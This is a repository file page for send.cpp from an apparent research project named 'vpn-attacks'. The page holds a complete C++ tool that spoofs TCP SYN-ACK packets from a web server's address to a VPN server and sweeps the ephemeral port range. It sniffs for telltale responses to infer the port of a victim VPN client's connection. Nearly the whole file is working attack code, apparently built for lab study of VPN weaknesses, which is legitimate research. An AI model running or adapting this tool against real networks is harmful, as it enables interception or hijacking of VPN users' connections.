Breakpointing-Bad-Public
/
vpn-attacks
7
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
33 Commits
1 Branch
0 Tags
530 MiB
Tree: 0a4e3bb714
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '0a4e3bb714'
${ noResults }
vpn-attacks/server-side-attack/tcp-sside/conn_inf/send.cpp

224 lines
4.9 KiB
Raw Normal View History

adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
  1. #include <tins/tins.h>
  2. #include <cassert>
  3. #include <iostream>
  4. #include <string>
  5. #include <unistd.h>
  6. #include <thread>
  9. using std::thread;
  10. using std::cout;
  11. using std::string;
  12. using std::vector;
  13. using namespace Tins;
  16. int current_spoof_port, best_port, chack_count;
  17. bool is_running = true;
  18. bool verbose = false;
  19. bool rechecking = true; // rechecks inferred port if true
  21. bool sniffed_resp = false;
  22. string dest_ip;
  23. string source_ip;
  27. void print_divider(int count) {
  28. int i = 0;
  29. while (i < count) {
  30. if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
  31. i++;
  32. }
  33. }
  36. bool handle_packet(PDU &some_pdu) {
  38. const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
  40. // keep track of the last port we spoofed
  41. if (ip.src_addr() == source_ip) current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
  44. // in this case we're looking for a packet from the vpn server to the vpn client
  45. //
  46. // the src ip should be the VPN server and dest ip should be
  47. // public address of victim
  49. if (ip.src_addr() == dest_ip) { // dest_ip should be public VPN IP
  51. const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
  52. //cout << "Payload size: " << payload << "\n";
  53. if (payload == 99) { // could be a NAT'ed attacker packet
  55. cout << "sniffed response from VPN server with port: " << current_spoof_port << " and size: " << payload << " \n";
  56. best_port = current_spoof_port;
  57. sniffed_resp = true;
  59. }
  60. }
  62. return is_running;
  63. }
  67. void sniff_stuff() {
  68. SnifferConfiguration config;
  69. config.set_promisc_mode(true);
  70. Sniffer sniffer("any", config);
  71. sniffer.sniff_loop(handle_packet);
  73. }
  76. int recheck_port(string source_ip, int sport, string dest_ip, int found_port, int num_checks) {
  78. PacketSender sender;
  79. NetworkInterface iface("enp0s9");
  81. IP pkt = IP(dest_ip, source_ip) / TCP(found_port, sport);
  82. TCP& tcp = pkt.rfind_pdu<TCP>();
  83. tcp.flags(TCP::SYN | TCP::ACK);
  85. int i = 0;
  87. while (i < num_checks) {
  89. cout << "Sending recheck probe number " << i << "\n\n";
  90. sender.send(pkt, iface);
  91. usleep(500);
  92. i ++;
  93. }
  95. usleep(3000000);
  97. return 1;
  98. }
  102. // Spreads SYNs across the victim's entire port range
  103. // coming from a specific remote_ip:port
  104. //
  105. int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
  107. PacketSender sender;
  108. NetworkInterface iface("enp0s9");
  110. IP pkt = IP(dest_ip, source_ip) / TCP(40400, sport);
  111. TCP& tcp = pkt.rfind_pdu<TCP>();
  112. tcp.flags(TCP::SYN | TCP::ACK);
  114. int current_port = best_port;
  115. int count = 0;
  116. int i = start_port;
  117. bool found = false;
  120. while (i < end_port && !found) {
  121. tcp.dport(i);
  122. sender.send(pkt, iface);
  123. //cout << "Current port= " << i << "\n";
  124. usleep(500);
  125. count++;
  126. i ++;
  127. if (count % 50 == 0) {
  128. //usleep(500);
  129. if (verbose) cout << " Current port = " << i << ". Best port = " << best_port << ".\n";
  130. }
  132. if (best_port != 0) found = true;
  134. }
  137. current_port = best_port;
  139. if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n";
  141. // In round 1 we spoofed really fast (10 sleep) to get a good estimate of the
  142. // port in use. Round 2, we spoof slower from about 50 packets back to account
  143. // for the delay in response and hopefully get the exact port number in use.
  144. print_divider(1);
  145. usleep(1000000 / 2);
  146. // sniffed_chack = false;
  147. int j = current_port - 300;
  148. found = false;
  149. best_port = 0;
  151. while (j < (current_port + 300) && !found) {
  152. tcp.dport(j); // set the packets dest port to current guess
  153. sender.send(pkt, iface);
  154. if (verbose) cout << "Current guess port = " << j << " and best port = " << best_port << " \n";
  155. usleep(10000);
  156. j ++;
  157. if (best_port != 0) found = true;
  158. }
  161. if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n";
  163. return best_port;
  167. }
  170. int find_port(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
  172. bool is_found = false;
  173. int current_port = 0;
  175. while (!is_found) {
  177. current_port = phase_two_spread(source_ip, sport, dest_ip, start_port, end_port);
  178. print_divider(1);
  180. if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
  182. is_found = true;
  184. }
  186. return current_port;
  188. }
  193. int main(int argc, char** argv) {
  195. if (argc != 4) {
  196. cout << "sike wrong number of args ---> (source_ip, sport, dest_ip)\n";
  197. return 0;
  198. }
  200. source_ip = argv[1]; // web server IP
  201. int sport = atoi(argv[2]); // most likely 80 or 443
  202. dest_ip = argv[3]; // vpn server IP
  203. verbose = true;
  205. int start_port = 32768;
  206. int end_port = 61000;
  208. print_divider(2);
  210. thread sniff_thread(sniff_stuff);
  212. int p = find_port(source_ip, sport, dest_ip, start_port, end_port);
  214. //cout << p << "\n";
  215. print_divider(1);
  217. if (rechecking) int res = recheck_port(source_ip, sport, dest_ip, p, 3);
  219. is_running = false;
  220. sniff_thread.join();
  223. return p;
  224. }